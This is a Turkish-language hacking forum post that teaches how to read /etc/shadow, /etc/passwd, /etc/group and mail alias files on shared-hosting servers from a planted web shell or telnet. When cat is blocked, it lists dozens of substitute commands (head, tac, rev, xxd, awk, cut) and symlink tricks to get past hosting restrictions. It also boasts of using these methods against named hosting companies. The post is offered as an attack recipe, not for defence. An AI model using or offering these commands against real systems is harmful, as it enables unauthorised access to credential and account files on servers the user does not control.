Credits
0
Rating - 0%
Merhaba bügün size komut shell yada telnet ile etc okuma komutlarini göstericem ayni taktikle symlink(symbolic)'te okuyabilirsiniz tabi bazi izinlerin açik olmasi gerekiyor (sym) için . ama her türlü ETC okursunuz.Bu komutlarin nerdeyse %95'ini paylaştim bukadar komut trde yok hepsi birbirinin copy pastesi.
bazi serverlerde bütün komutlar engelli oluyor genellikle cat - more - less falan filan. tabi security expertlerin bilmedigi komutlar var mesela isimtescil'de cat -n ile config okunuyordu yada yetkinhostingde güzelnet'te head -n ile okunuluyordu geçen sene taktik size kalmiş :).
View hidden content is available for registered users!

ilk siz /etc/shadow okuyun eğer perm verirse passwd okursunuz.
eğer passwd okunmuyorsa /etc/group okuyabilirsiniz.
komut shellimizdedeki kodlar'i veriyorum size :
komutlara "-n"de ekleyebilirsiniz tabi hepsine degil ilk 10 koda ekleyebilirsiniz. örnek:cat -n /etc/passwd
ayni şekil -v ve -e ve -s -u komutuylada okuabilirsiniz ;) araplardan çaldik bunuda amk zaten :) arapçada biliyorum degilmi ? ;)
yada bazi komutlarda tail -c 100 /etc/passwd <> head -c 100 /etc/passwd diye okuyabilirsiniz.

head /etc/passwd
paste /etc/passwd
vi /etc/passwd
more /etc/passwd
tac /etc/passwd
less /etc/passwd
tail /etc/passwd
rev /etc/passwd
xxd /etc/passwd /etc/passwd
awk -F: ‘{ print $1 }’ /etc*/passwd | sort
ls -l /etc/passwd
cut -f 1,7 -d: /etc/passwd
awk -F: ‘{ print $1 ” “$2 ” ” $3″ “$4″ “$5 ” “$6″ “$7″ “}’ /etc*/passwd | sort
cd /etc;cat passwd
cat /etc/valiases/xxx.com
awk -F”:” ‘{ print “user****: ” $1 “\t\tuid:” $3 }’ /etc/passwd
grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 ** print $1}’
bunlarla ekrana yansitabilir

ln -s /etc/passwd 1.txt
ln -b /etc/passwd 1.txt
ln -v /etc/passwd 1.txt
cut -d /etc/passwd >> 1.txt
cp /etc/passwd >> 1.txt

head -n /etc/passwd >> 2.txt şeklindede yazdirabilirsiniz.
cat , less - ,vb vb şeklindede yazdirabilirsiniz.
tabi bilmeyenler için söylüyorum >> ve 1.txt şeklindeki komutlar ekrana yansitmaz yeni dosyaya yazar ya siz o dosyayi okursunuz yada indirirsiniz.

sunucu firmasi /etc/passwd dosyasini sizden saklayamaz her türlü sike sike okursunuz tek sıkıntı symbolic (SYMLİNK) Güvenligi (perm,) yada firewall güvenligi ile (litespeed,modsecurity) ile saklar onlar içinde bazi okuma methodlari var.

Last edited:

Users who are viewing this thread